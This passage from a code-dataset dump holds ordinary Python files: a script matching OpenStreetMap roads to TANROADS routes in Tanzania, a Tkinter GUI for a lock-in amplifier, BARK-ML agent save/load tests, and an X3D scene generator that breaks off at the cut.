these two nodes.\"\"\"\n return np.array(json.loads(sg[n0][n1]['Json'])['coordinates'])\n\nEARTH_R = 6372.8\ndef geocalc(lat0, lon0, lat1, lon1):\n \"\"\"Return the distance (in km) between two points in\n geographical coordinates.\"\"\"\n lat0 = np.radians(lat0)\n lon0 = np.radians(lon0)\n lat1 = np.radians(lat1)\n lon1 = np.radians(lon1)\n dlon = lon0 - lon1\n y = np.sqrt(\n (np.cos(lat1) * np.sin(dlon)) ** 2\n + (np.cos(lat0) * np.sin(lat1)\n - np.sin(lat0) * np.cos(lat1) * np.cos(dlon)) ** 2)\n x = np.sin(lat0) * np.sin(lat1) + \\\n np.cos(lat0) * np.cos(lat1) * np.cos(dlon)\n c = np.arctan2(y, x)\n return EARTH_R * c\n\ndef get_path_length(path):\n return np.sum(geocalc(path[1:,0], path[1:,1],\n path[:-1,0], path[:-1,1]))\n\ndef get_full_path(path,sg):\n \"\"\"Return the positions along a path.\"\"\"\n p_list = []\n curp = None\n for i in range(len(path)-1):\n p = get_path(path[i], path[i+1],sg)\n if curp is None:\n curp = p\n if np.sum((p[0]-curp)**2) > np.sum((p[-1]-curp)**2):\n p = p[::-1,:]\n p_list.append(p)\n curp = p[-1]\n return np.vstack(p_list)\n\nif __name__ == \"__main__\":\n\n# =============================================================================\n# # set basics and give version number\n# =============================================================================\n infra_type = 'highway'\n \n base_path = os.path.join(os.path.dirname(__file__), '..')\n country_data_dir = os.path.join(base_path,'input_data')\n \n # give version:\n version = 'v5'\n# =============================================================================\n# # load tanzania data from OSM \n# =============================================================================\n \n country = 'tanzania'\n country_path_in = os.path.join(country_data_dir,'%s-%s-tr.shp' % (country,infra_type))\n country_path_2 = os.path.join(base_path,'calc','%s-%s.shp' % (country,infra_type))\n country_path_out = os.path.join(base_path,'output_data','tanroads_all_2017_%s.shp' % (version))\n\n# =============================================================================\n# give the dataset max speeds based on the given weights in the extract_osm function\n# =============================================================================\n gpd_country = 
gpd.read_file(country_path_in)\n weights = {1: '80', 2:'60', 3: '50', 4:'40',5:'40'}\n gpd_country['speed'] = gpd_country['weight'].map(lambda x: np.int(weights[x]))\n gpd_country.crs = {'init' :'epsg:4326'}\n gpd_country.to_file(country_path_2)\n \n# =============================================================================\n# # load country graph\n# =============================================================================\n g = nx.read_shp(country_path_2)\n sg = max(nx.connected_component_subgraphs(g.to_undirected()), key=len)\n\n# =============================================================================\n# # read nodes\n# =============================================================================\n nodes = np.array(sg.nodes())\n\n# =============================================================================\n# # get dict with all the nodes \n# =============================================================================\n pos = {k: v for k,v in enumerate(sg.nodes())}\n\n# =============================================================================\n# # load nodes from tanroads\n# =============================================================================\n node_path = os.path.join(base_path,'input_data','nodes_2017.shp')\n nodes_tanroads = gpd.read_file(node_path)\n \n# =============================================================================\n# # Load tanroads all\n# =============================================================================\n tanroads_path = os.path.join(base_path,'calc','tanroads_all_2017.shp')\n tanroads_2017 = gpd.read_file(tanroads_path) \n tanroads_2017.geometry\n combi_routes = list(zip(list(tanroads_2017.startumber),list(tanroads_2017.endnoumber)))\n \n# =============================================================================\n# # Compute the length of the road segments.\n# =============================================================================\n for n0, n1 in sg.edges():\n path = get_path(n0, n1,sg)\n distance = get_path_length(path)\n sg[n0][n1]['distance'] = distance\n sg[n0][n1]['t_time'] = distance/sg[n0][n1]['speed'] \n \n# =============================================================================\n# MAIN CALCULATION: find and compare geometries between osm and tanroads\n# =============================================================================\n inb_shortest = {}\n count = 0\n failures = []\n for route in combi_routes: \n try:\n origin = np.array(nodes_tanroads[nodes_tanroads['NodeNumber'] == route[0]].geometry.y)[0],np.array(nodes_tanroads[nodes_tanroads['NodeNumber'] == route[0]].geometry.x)[0]\n destination = np.array(nodes_tanroads[nodes_tanroads['NodeNumber'] == route[1]].geometry.y)[0],np.array(nodes_tanroads[nodes_tanroads['NodeNumber'] == route[1]].geometry.x)[0]\n \n pos0_i = np.argmin(np.sum((nodes[:,::-1] - origin)**2, axis=1))\n pos1_i = np.argmin(np.sum((nodes[:,::-1] - destination)**2, axis=1)) \n\n # Compute the shortest path.\n path = nx.shortest_path(sg,\n source=tuple(nodes[pos0_i]),\n target=tuple(nodes[pos1_i]),\n weight='distance')\n \n roads = pd.DataFrame([sg[path[i]][path[i + 1]]\n for i in range(len(path) - 1)],\n columns=['osm_id', 'name','Wkt',\n 'highway', 'weight','t_time','distance'])\n \n \n roads['geometry'] = roads['Wkt'].map(shapely.wkt.loads)\n roads.drop('Wkt', axis=1,inplace=True) \n lines = shapely.ops.linemerge(list(roads.geometry))\n get_index = tanroads_2017.query('startumber == %s and endnoumber == %s' % (route[0],route[1])).index[0]\n distance = roads['distance'].sum()\n 
distance_tr = get_path_length(np.array(list(tanroads_2017.loc[get_index].geometry.coords)))\n\n# =============================================================================\n# update geodataframe based on difference in distance. If osm is shorter, use osm\n# =============================================================================\n if distance < distance_tr: \n inb_shortest[route] = lines\n else:\n inb_shortest[route] = tanroads_2017.loc[get_index].geometry\n except:\n failures.append(route)\n count += 1\n get_index = tanroads_2017.query('startumber == %s and endnoumber == %s' % (route[0],route[1])).index[0]\n inb_shortest[route] = tanroads_2017.loc[get_index].geometry\n\n# =============================================================================\n# and create a list of the geometries with all the new routes\n# =============================================================================\n inb_list = [] \n for route in combi_routes: \n inb_list.append(inb_shortest[route])\n\n# =============================================================================\n# and save to new file\n# =============================================================================\n tanroads_2017['geometry'] = inb_list\n tanroads_2017.to_file(country_path_out)\n\n\n \n ","sub_path":"scripts/1_preprocess/network/map_osm_tanroads.py","file_name":"map_osm_tanroads.py","file_ext":"py","file_size_in_byte":8182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"495700491","text":"from Tkinter import *\nimport tkMessageBox\n\nfrom lib.tkValidatingEntry import *\n\nmenu_font_type = (\"Helvetica\"\t, 11, 'normal')\t# font description\nmenu_font_type2 = (\"Verdana\"\t, 12, 'normal')\t# font description\noption_menu_width = 16\n\nPRE_AMP_GAIN \t= ['1', '10', '100']\n\nPOST_AMP_GAIN \t= ['1', '10', '100']\n\nINTG_TIME_CONST \t= ['1s', '10ms', '100us']\n\ndef app_xlia(master):\n\tif master == None:\n\t\treturn None\n\toAppXLIA = XLIAGui(master)\n\treturn oAppXLIA \n\nclass XLIAGui:\n\tdef __init__(self, master):\n\t\tself.master = master\n\t\t#self.master.title('Xplore Lock-in Amplifier')\n\t\tself._createWidgets()\n\t\treturn\n\n\tdef _createWidgets(self):\n\t\tself.master.config(padx=4,pady=4)\n\t\t\n\t\tself.mainmenu = Menu(self.master, font=menu_font_type)\n\t\tself.mainmenu.config(borderwidth=1)\n\t\tself.master.config(menu=self.mainmenu)\n\t\t\n\t\tself.filemenu = Menu(self.mainmenu, font=menu_font_type)\n\t\tself.filemenu.config(tearoff=0)\n\t\t\n\t\tself.settingmenu = Menu(self.mainmenu, font=menu_font_type)\n\t\tself.settingmenu.config(tearoff=0)\n\t\t\n\t\tself.preAmpGainMenu = Menu(self.settingmenu, font=menu_font_type)\n\t\tself.preAmpGainMenu.config(tearoff=0)\n\t\t\n\t\tself.postAmpGainMenu = Menu(self.settingmenu, font=menu_font_type)\n\t\tself.postAmpGainMenu.config(tearoff=0)\n\t\t\n\t\tself.timeConstMenu = Menu(self.settingmenu, font=menu_font_type)\n\t\tself.timeConstMenu.config(tearoff=0)\n\t\t\n\t\t### REFERENCE ###\n\t\tself.LFRef = LabelFrame(self.master, \\\n\t\t\tpadx=8, pady=6, \\\n\t\t\ttext='Reference')\n\t\tself.LFRef.grid(row=0, column=0, sticky=N+W+E+S)\n\t\tself.LFRefAmplitude = LabelFrame(self.LFRef, \\\n\t\t\tpadx=4, pady=5, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='Amplitude')\n\t\tself.LFRefAmplitude.grid(row=0, column=0, sticky=N+W+E+S)\n\t\tself.EntryRefAmplitude = IntegerEntry(self.LFRefAmplitude, \\\n\t\t\tbg='white', \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\tjustify=RIGHT, 
\\\n\t\t\twidth=8)\n\t\tself.EntryRefAmplitude.grid(row=0, column=0, sticky=E)\n\t\tLabel(self.LFRefAmplitude, \\\n\t\t\ttext = 'mV', \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\t).grid(row=0, column=1, sticky=W)\n\n\t\tself.LFRefFrequency = LabelFrame(self.LFRef, \\\n\t\t\tpadx=4, pady=5, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='Frequency')\n\t\tself.LFRefFrequency.grid(row=1, column=0, sticky=N+W+E+S)\n\t\tself.EntryRefFrequency = IntegerEntry(self.LFRefFrequency, \\\n\t\t\tbg='white', \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\tjustify=RIGHT, \\\n\t\t\twidth=8)\n\t\tself.EntryRefFrequency.grid(row=0, column=0, sticky=E)\n\t\tLabel(self.LFRefFrequency, \\\n\t\t\ttext = 'Hz', \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\t).grid(row=0, column=1, sticky=W)\n\n\t\tself.LFRefPhase = LabelFrame(self.LFRef, \\\n\t\t\tpadx=4, pady=5, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='Phase')\n\t\tself.LFRefPhase.grid(row=2, column=0, sticky=N+W+E+S)\n\t\tself.EntryRefPhase = IntegerEntry(self.LFRefPhase, \\\n\t\t\tbg='white', \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\tjustify=RIGHT, \\\n\t\t\twidth=8)\n\t\tself.EntryRefPhase.grid(row=0, column=0, sticky=E)\n\t\tLabel(self.LFRefPhase, \\\n\t\t\ttext = 'o', \\\n\t\t\tfont=('Helvetica', 15, 'bold'), \\\n\t\t\t).grid(row=0, column=1, sticky=N+W)\n\t\t\n\t\t### Settings ####\n\t\tself.LFSet = LabelFrame(self.master, \\\n\t\t\tpadx=4, pady=4, \\\n\t\t\ttext='Settings')\n\t\tself.LFSet.grid(row=0, column=1, sticky='news')\n\t\t\n\t\t### PreAmp_AC_Coupling ####\n\t\tself.LFCoupling = LabelFrame(self.LFSet, \\\n\t\t\tpadx=4, pady=4, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='Pre Amplification AC Coupling')\n\t\tself.LFCoupling.grid(row=0, column=0, sticky='news')\n\t\tself.BtnEnableCoupling = Checkbutton(self.LFCoupling, \\\n\t\t\t#variable=self.PreAmpAC_CouplingSelected, \\\n\t\t\tonvalue=1, offvalue=0, \\\n\t\t\ttext=' Enabled')\n\t\tself.BtnEnableCoupling.grid(row=0, column=0, sticky='news')\n\t\t\n\t\t### Set PreAmp Gain ####\n\t\tself.LFPreAmpGain = LabelFrame(self.LFSet, \\\n\t\t\tpadx=4, pady=4, text='Pre Amplification Gain', \\\n\t\t\t\tfg='blue')\n\t\tself.LFPreAmpGain.grid(row = 1,column = 0, sticky=E+W)\n\t\n\t\t### Set PostAmp Gain ####\n\t\tself.LFPostAmpGain = LabelFrame(self.LFSet, \\\n\t\t\tpadx=4, pady=4, text='Post Amplification Gain', \\\n\t\t\t\tfg='blue')\n\t\tself.LFPostAmpGain.grid(row = 2,column = 0, sticky=E+W)\n\t\t\t\t\n\t\t### Set Integrator Time Constant ####\n\t\tself.LFTimeConst = LabelFrame(self.LFSet, \\\n\t\t\tpadx=4, pady=4, text='Integrator Time Constant', \\\n\t\t\t\tfg='blue')\n\t\tself.LFTimeConst.grid(row = 3,column = 0, sticky=E+W)\n\t\t\n\t\t### OUTPUT ###\n\t\tself.LFOutput = LabelFrame(self.master, \\\n\t\t\tpadx=4, pady=4, \\\n\t\t\ttext='Output')\n\t\tself.LFOutput.grid(row=1, column=0, columnspan=2, rowspan=2, sticky='news')\n\t\tself.LFInPhaseOutput = LabelFrame(self.LFOutput, \\\n\t\t\tpadx = 40, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='In-Phase Output')\n\t\tself.LFInPhaseOutput.grid(row=0, column=0, sticky='news')\n\t\t\n\t\tself.LblInPhaseOutput = Label(self.LFInPhaseOutput, \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\tjustify=LEFT)\n\t\tself.LblInPhaseOutput.grid(row=0, column=0, sticky='news')\n\t\t\n\t\tself.LFQuadratureOutput = LabelFrame(self.LFOutput, \\\n\t\t\tpadx = 40, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='Quadrature Output')\n\t\tself.LFQuadratureOutput.grid(row=0, column=1, sticky='news')\n\n\t\tself.LblQuadratureOutput = Label(self.LFQuadratureOutput, \\\n\t\t\tfont=('Helvetica', 20, 
'bold'), \\\n\t\t\tjustify=LEFT)\n\t\tself.LblQuadratureOutput.grid(row=0, column=0, sticky='news')\n\t\tself.LFAmplitudeOutput = LabelFrame(self.LFOutput, \\\n\t\t\tpadx = 40, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='Amplitude Out.')\n\t\tself.LFAmplitudeOutput.grid(row=1, column=0, sticky='news')\n\t\t\n\t\tself.LblAmplitudeOutput = Label(self.LFAmplitudeOutput, \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\tjustify=LEFT)\n\t\tself.LblAmplitudeOutput.grid(row=0, column=0, sticky='news')\n\t\t\n\t\tself.LFPhaseOutput = LabelFrame(self.LFOutput, \\\n\t\t\tpadx = 40, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='Phase Out.')\n\t\tself.LFPhaseOutput.grid(row=1, column=1, sticky='news')\n\t\t\n\t\tself.LblPhaseOutput = Label(self.LFPhaseOutput, \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\tjustify=LEFT)\n\t\tself.LblPhaseOutput.grid(row=0, column=0, sticky='news')\n\t\t\n\t\treturn\n\t\n\tdef createOptionMenus(self, varPreAG = None, varPostAG = None, varTC = None):\n\t\tself.OMPreAmpGain = OptionMenu(self.LFPreAmpGain, varPreAG, None)#, \\\n\t\t#self.PreAmpGainSelected, None)\n\t\tself.OMPreAmpGain['menu'].delete(0, 'end')\n\t\tself.OMPreAmpGain.config(width=option_menu_width, anchor='w')\n\t\tself.OMPreAmpGain.grid(row=0, column=0, sticky=E+W)\n\n\t\tself.OMPostAmpGain = OptionMenu(self.LFPostAmpGain, varPostAG, None)#, \\\n\t\t#self.PostAmpGainSelected, None)\n\t\tself.OMPostAmpGain['menu'].delete(0, 'end')\n\t\tself.OMPostAmpGain.config(width=option_menu_width, anchor='w')\n\t\tself.OMPostAmpGain.grid(row=0, column=0, sticky=E+W)\n\n\t\tself.OMTimeConst = OptionMenu(self.LFTimeConst, varTC, None)#, \\\n\t\t#self.TimeConstSelected, None)\n\t\tself.OMTimeConst['menu'].delete(0, 'end')\n\t\tself.OMTimeConst.config(width=option_menu_width, anchor='w')\n\t\tself.OMTimeConst.grid(row=0, column=0, sticky=E+W)\n\n\t\treturn\n\t\n\tdef vConfimationPopup(self):\n\t\treturn tkMessageBox.askyesno('Could not detect XLIA', 'Connection to XLIA Device lost!\\n Try Reconnecting?', default=tkMessageBox.YES, parent = self.master)\n\n\tdef vCreatePlotFrame(self):\n\t\tself.LFPlotFrame = LabelFrame(self.master, \\\n\t\t\ttext='RT & IV Data Plots')\n\t\tself.LFPlotFrame.grid(row=0, column=2, rowspan=10, sticky=N+W+E+S)\n\t\t\n\t\treturn self.LFPlotFrame\n\nif __name__ == '__main__':\n\troot = Tk()\n\toAppXLIA = app_xlia(root)\n\troot.mainloop()\n","sub_path":"utilities/lia/app_xlia.py","file_name":"app_xlia.py","file_ext":"py","file_size_in_byte":7138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"334102577","text":"# Copyright (c) 2020 fortiss GmbH\n#\n# Authors: Julian Bernhard, Patrick Hart\n#\n# This work is licensed under the terms of the MIT license.\n# For a copy, see .\n\ntry:\n import debug_settings\nexcept:\n pass\n\n\nimport unittest\nimport numpy as np\nimport os\nimport gym\nimport matplotlib\nimport time\n\n# BARK imports\nfrom bark.runtime.commons.parameters import ParameterServer\n\n# BARK-ML imports\nfrom bark_ml.environments.blueprints import \\\n DiscreteHighwayBlueprint, DiscreteMergingBlueprint\nfrom bark_ml.environments.single_agent_runtime import SingleAgentRuntime\nimport bark_ml.environments.gym\nfrom bark_ml.library_wrappers.lib_fqf_iqn_qrdqn.agent import FQFAgent, IQNAgent\nfrom bark_ml.observers.nearest_state_observer import NearestAgentsObserver\nfrom bark_ml.behaviors.discrete_behavior import BehaviorDiscreteMacroActionsML\n\n\nclass BaseAgentTests(unittest.TestCase):\n def test_agents(self):\n params = ParameterServer()\n 
params[\"ML\"][\"BaseAgent\"][\"NumSteps\"] = 2\n params[\"ML\"][\"BaseAgent\"][\"MaxEpisodeSteps\"] = 2\n\n bp = DiscreteHighwayBlueprint(params, number_of_senarios=10, random_seed=0)\n env = SingleAgentRuntime(blueprint=bp, render=False)\n env._observer = NearestAgentsObserver(params)\n env._action_wrapper = BehaviorDiscreteMacroActionsML(params)\n\n fqf_agent = FQFAgent(agent_save_dir=\"./save_dir\", env=env, params=params)\n fqf_agent.train_episode()\n\n fqf_agent.save(checkpoint_type=\"best\")\n fqf_agent.save(checkpoint_type=\"last\")\n\n loaded_agent = FQFAgent(agent_save_dir=\"./save_dir\", checkpoint_load=\"best\")\n loaded_agent2 = FQFAgent(agent_save_dir=\"./save_dir\", checkpoint_load=\"last\")\n \n loaded_agent_with_env = FQFAgent(env=env, agent_save_dir=\"./save_dir\", checkpoint_load=\"last\")\n loaded_agent_with_env.train_episode()\n\n self.assertEqual(loaded_agent.ml_behavior.action_space.n, fqf_agent.ml_behavior.action_space.n)\n self.assertEqual(loaded_agent.ent_coef, fqf_agent.ent_coef)\n return\n\n def test_iqn_agent(self):\n params = ParameterServer()\n params[\"ML\"][\"BaseAgent\"][\"NumSteps\"] = 2\n params[\"ML\"][\"BaseAgent\"][\"MaxEpisodeSteps\"] = 2\n\n bp = DiscreteHighwayBlueprint(params, number_of_senarios=10, random_seed=0)\n env = SingleAgentRuntime(blueprint=bp, render=False)\n env._observer = NearestAgentsObserver(params)\n env._action_wrapper = BehaviorDiscreteMacroActionsML(params)\n\n iqn_agent = IQNAgent(agent_save_dir=\"./save_dir\", env=env, params=params)\n iqn_agent.train_episode()\n\n iqn_agent.save(checkpoint_type=\"best\")\n iqn_agent.save(checkpoint_type=\"last\")\n\n loaded_agent = IQNAgent(agent_save_dir=\"./save_dir\", checkpoint_load=\"best\")\n loaded_agent2 = IQNAgent(agent_save_dir=\"./save_dir\", checkpoint_load=\"last\")\n \n loaded_agent_with_env = IQNAgent(env=env, agent_save_dir=\"./save_dir\", checkpoint_load=\"last\")\n loaded_agent_with_env.train_episode()\n\n self.assertEqual(loaded_agent.ml_behavior.action_space.n, iqn_agent.ml_behavior.action_space.n)\n return\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"bark_ml/library_wrappers/lib_fqf_iqn_qrdqn/tests/save_load_test.py","file_name":"save_load_test.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"561040506","text":"import x3dpsail as x3d\nX3D0 = x3d.X3D()\nX3D0.setProfile(\"Immersive\")\nX3D0.setVersion(\"3.3\")\n# x3dVersionComparisonTest for this model: supportsX3dVersion(X3DObject.VERSION_3_0)=true \r\nhead1 = x3d.head()\n# comment #1 \r\n# comment #2 \r\n# comment #3 \r\n# comment #4 \r\ncomponent2 = x3d.component()\ncomponent2.setName(\"Navigation\")\ncomponent2.setLevel(3)\n\nhead1.addComponent(component2)\ncomponent3 = x3d.component()\ncomponent3.setName(\"Layering\")\ncomponent3.setLevel(1)\n\nhead1.addComponent(component3)\ncomponent4 = x3d.component()\ncomponent4.setName(\"Shaders\")\ncomponent4.setLevel(1)\n\nhead1.addComponent(component4)\ncomponent5 = x3d.component()\ncomponent5.setName(\"CADGeometry\")\ncomponent5.setLevel(2)\n\nhead1.addComponent(component5)\ncomponent6 = x3d.component()\ncomponent6.setName(\"DIS\")\ncomponent6.setLevel(2)\n\nhead1.addComponent(component6)\ncomponent7 = x3d.component()\ncomponent7.setName(\"H-Anim\")\ncomponent7.setLevel(1)\n\nhead1.addComponent(component7)\nunit8 = x3d.unit()\nunit8.setName(\"AngleUnitConversion\")\nunit8.setCategory(\"angle\")\nunit8.setConversionFactor(1.0)\n\nhead1.addUnit(unit8)\nunit9 = 
x3d.unit()\nunit9.setName(\"LengthUnitConversion\")\nunit9.setCategory(\"length\")\nunit9.setConversionFactor(1.0)\n\nhead1.addUnit(unit9)\nunit10 = x3d.unit()\nunit10.setName(\"ForceFromPoundsToNewtons\")\nunit10.setCategory(\"force\")\nunit10.setConversionFactor(4.4482)\n\nhead1.addUnit(unit10)\nmeta11 = x3d.meta()\nmeta11.setContent(\"HelloWorldProgramOutput.x3d\")\nmeta11.setName(\"title\")\n\nhead1.addMeta(meta11)\nmeta12 = x3d.meta()\nmeta12.setContent(\"continued development and testing in progress\")\nmeta12.setName(\"info\")\n\nhead1.addMeta(meta12)\nmeta13 = x3d.meta()\nmeta13.setContent(\"Example HelloWorldProgram creates an X3D model using the X3D Java Scene Access Interface Library (X3DJSAIL)\")\nmeta13.setName(\"description\")\n\nhead1.addMeta(meta13)\nmeta14 = x3d.meta()\nmeta14.setContent(\"http://www.web3d.org/specifications/java/X3DJSAIL.html\")\nmeta14.setName(\"reference\")\n\nhead1.addMeta(meta14)\nmeta15 = x3d.meta()\nmeta15.setContent(\"HelloWorldProgramOutput.java\")\nmeta15.setName(\"generator\")\n\nhead1.addMeta(meta15)\nmeta16 = x3d.meta()\nmeta16.setContent(\"6 September 2016\")\nmeta16.setName(\"created\")\n\nhead1.addMeta(meta16)\nmeta17 = x3d.meta()\nmeta17.setContent(\"19 June 2019\")\nmeta17.setName(\"modified\")\n\nhead1.addMeta(meta17)\nmeta18 = x3d.meta()\nmeta18.setContent(\"X3D Java Scene Access Interface Library (X3DJSAIL)\")\nmeta18.setName(\"generator\")\n\nhead1.addMeta(meta18)\nmeta19 = x3d.meta()\nmeta19.setContent(\"http://www.web3d.org/specifications/java/examples/HelloWorldProgram.java\")\nmeta19.setName(\"generator\")\n\nhead1.addMeta(meta19)\nmeta20 = x3d.meta()\nmeta20.setContent(\"Netbeans http://www.netbeans.org\")\nmeta20.setName(\"generator\")\n\nhead1.addMeta(meta20)\nmeta21 = x3d.meta()\nmeta21.setContent(\"Don Brutzman\")\nmeta21.setName(\"creator\")\n\nhead1.addMeta(meta21)\nmeta22 = x3d.meta()\nmeta22.setContent(\"https://sourceforge.net/p/x3d/code/HEAD/tree/www.web3d.org/x3d/stylesheets/java/examples/HelloWorldProgramOutput.x3d\")\nmeta22.setName(\"reference\")\n\nhead1.addMeta(meta22)\nmeta23 = x3d.meta()\nmeta23.setContent(\"Console output, ClassicVRML encoding, VRML97 encoding and pretty-print documentation:\")\nmeta23.setName(\"reference\")\n\nhead1.addMeta(meta23)\nmeta24 = x3d.meta()\nmeta24.setContent(\"HelloWorldProgramOutput.txt\")\nmeta24.setName(\"reference\")\n\nhead1.addMeta(meta24)\nmeta25 = x3d.meta()\nmeta25.setContent(\"HelloWorldProgramOutput.x3dv\")\nmeta25.setName(\"reference\")\n\nhead1.addMeta(meta25)\nmeta26 = x3d.meta()\nmeta26.setContent(\"HelloWorldProgramOutput.wrl\")\nmeta26.setName(\"reference\")\n\nhead1.addMeta(meta26)\nmeta27 = x3d.meta()\nmeta27.setContent(\"HelloWorldProgramOutput.html\")\nmeta27.setName(\"reference\")\n\nhead1.addMeta(meta27)\nmeta28 = x3d.meta()\nmeta28.setContent(\"https://savage.nps.edu/X3dValidator?url=http://www.web3d.org/specifications/java/examples/HelloWorldProgramOutput.x3d\")\nmeta28.setName(\"reference\")\n\nhead1.addMeta(meta28)\nmeta29 = x3d.meta()\nmeta29.setContent(\"http://www.web3d.org/specifications/java/examples/HelloWorldProgramOutput.x3d\")\nmeta29.setName(\"identifier\")\n\nhead1.addMeta(meta29)\nmeta30 = x3d.meta()\nmeta30.setContent(\"../license.html\")\nmeta30.setName(\"license\")\n\nhead1.addMeta(meta30)\n\nX3D0.setHead(head1)\nScene31 = x3d.Scene()\nViewpointGroup32 = x3d.ViewpointGroup()\nViewpointGroup32.setDescription(\"Available viewpoints\")\nViewpoint33 = x3d.Viewpoint()\nViewpoint33.setDEF(\"DefaultView\")\nViewpoint33.setDescription(\"Hello 
X3DJSAIL\")\n\nViewpointGroup32.addChildren(Viewpoint33)\nViewpoint34 = x3d.Viewpoint()\nViewpoint34.setDEF(\"TopDownView\")\nViewpoint34.setDescription(\"top-down view from above\")\nViewpoint34.setOrientation([1,0,0,-1.570796])\nViewpoint34.setPosition([0,100,0])\n\nViewpointGroup32.addChildren(Viewpoint34)\n\nScene31.addChildren(ViewpointGroup32)\nNavigationInfo35 = x3d.NavigationInfo()\nNavigationInfo35.setAvatarSize([0.25,1.6,0.75])\nNavigationInfo35.setTransitionType([\"LINEAR\"])\nNavigationInfo35.setType([\"EXAMINE\",\"FLY\",\"ANY\"])\n\nScene31.addChildren(NavigationInfo35)\nWorldInfo36 = x3d.WorldInfo()\nWorldInfo36.setDEF(\"WorldInfoDEF\")\nWorldInfo36.setTitle(\"HelloWorldProgram produced by X3D Java SAI Library (X3DJSAIL)\")\n\nScene31.addChildren(WorldInfo36)\nWorldInfo37 = x3d.WorldInfo()\nWorldInfo37.setUSE(\"WorldInfoDEF\")\n\nScene31.addChildren(WorldInfo37)\nWorldInfo38 = x3d.WorldInfo()\nWorldInfo38.setUSE(\"WorldInfoDEF\")\n\nScene31.addChildren(WorldInfo38)\nMetadataString39 = x3d.MetadataString()\nMetadataString39.setDEF(\"scene.addChildMetadata\")\nMetadataString39.setName(\"test\")\nMetadataString39.setValue([\"Top-level root Metadata node beneath Scene needs to be one of '-children' in JSON encoding\"])\n\nScene31.addMetadata(MetadataString39)\nLayerSet40 = x3d.LayerSet()\nLayerSet40.setDEF(\"scene.addChildLayerSetTest\")\nLayerSet40.setOrder([0])\n\nScene31.addLayerSet(LayerSet40)\nTransform41 = x3d.Transform()\nTransform41.setDEF(\"LogoGeometryTransform\")\nTransform41.setTranslation([0,1.5,0])\nAnchor42 = x3d.Anchor()\nAnchor42.setDescription(\"select for X3D Java SAI Library (X3DJSAIL) description\")\nAnchor42.setUrl([\"../X3DJSAIL.html\",\"http://www.web3d.org/specifications/java/X3DJSAIL.html\"])\nShape43 = x3d.Shape()\nShape43.setDEF(\"BoxShape\")\nAppearance44 = x3d.Appearance()\nMaterial45 = x3d.Material()\nMaterial45.setDEF(\"GreenMaterial\")\nMaterial45.setDiffuseColor([0,1,1])\nMaterial45.setEmissiveColor([0.8,0,0])\nMaterial45.setTransparency(0.1)\n\nAppearance44.setMaterial(Material45)\nImageTexture46 = x3d.ImageTexture()\nImageTexture46.setUrl([\"images/X3dJavaSceneAccessInterfaceSaiLibrary.png\",\"http://www.web3d.org/specifications/java/examples/images/X3dJavaSceneAccessInterfaceSaiLibrary.png\"])\n\nAppearance44.setTexture(ImageTexture46)\n\nShape43.setAppearance(Appearance44)\nBox47 = x3d.Box()\nBox47.setDEF(\"test-NMTOKEN_regex.0123456789\")\nBox47.setCssClass(\"untextured\")\n\nShape43.setGeometry(Box47)\n\nAnchor42.addChildren(Shape43)\n\nTransform41.addChildren(Anchor42)\n\nScene31.addChildren(Transform41)\nShape48 = x3d.Shape()\nShape48.setDEF(\"LineShape\")\nAppearance49 = x3d.Appearance()\nMaterial50 = x3d.Material()\nMaterial50.setEmissiveColor([0.6,0.19607843,0.8])\n\nAppearance49.setMaterial(Material50)\n\nShape48.setAppearance(Appearance49)\nIndexedLineSet51 = x3d.IndexedLineSet()\nIndexedLineSet51.setCoordIndex([0,1,2,3,4,0])\n# Coordinate 3-tuple point count: 6 \r\nCoordinate52 = x3d.Coordinate()\nCoordinate52.setPoint([0,1.5,0,2,1.5,0,2,1.5,-2,-2,1.5,-2,-2,1.5,0,0,1.5,0])\n\nIndexedLineSet51.setCoord(Coordinate52)\n\nShape48.setGeometry(IndexedLineSet51)\n\nScene31.addChildren(Shape48)\nPositionInterpolator53 = x3d.PositionInterpolator()\nPositionInterpolator53.setDEF(\"BoxPathAnimator\")\nPositionInterpolator53.setKey([0,0.125,0.375,0.625,0.875,1])\nPositionInterpolator53.setKeyValue([0,1.5,0,2,1.5,0,2,1.5,-2,-2,1.5,-2,-2,1.5,0,0,1.5,0])\n\nScene31.addChildren(PositionInterpolator53)\nTimeSensor54 = 
x3d.TimeSensor()\nTimeSensor54.setDEF(\"OrbitClock\")\nTimeSensor54.setCycleInterval(8.0)\nTimeSensor54.setLoop(True)\n\nScene31.addChildren(TimeSensor54)\nROUTE55 = x3d.ROUTE()\nROUTE55.setFromField(\"fraction_changed\")\nROUTE55.setFromNode(\"OrbitClock\")\nROUTE55.setToField(\"set_fraction\")\nROUTE55.setToNode(\"BoxPathAnimator\")\n\nScene31.addChildren(ROUTE55)\nROUTE56 = x3d.ROUTE()\nROUTE56.setFromField(\"value_changed\")\nROUTE56.setFromNode(\"BoxPathAnimator\")\nROUTE56.setToField(\"set_translation\")\nROUTE56.setToNode(\"LogoGeometryTransform\")\n\nScene31.addChildren(ROUTE56)\nTransform57 = x3d.Transform()\nTransform57.setDEF(\"TextTransform\")\nTransform57.setTranslation([0,-1.5,0])\nShape58 = x3d.Shape()\nAppearance59 = x3d.Appearance()\nMaterial60 = x3d.Material()\nMaterial60.setUSE(\"GreenMaterial\")\n\nAppearance59.setMaterial(Material60)\n\nShape58.setAppearance(Appearance59)\nText61 = x3d.Text()\nText61.setString([\"X3D 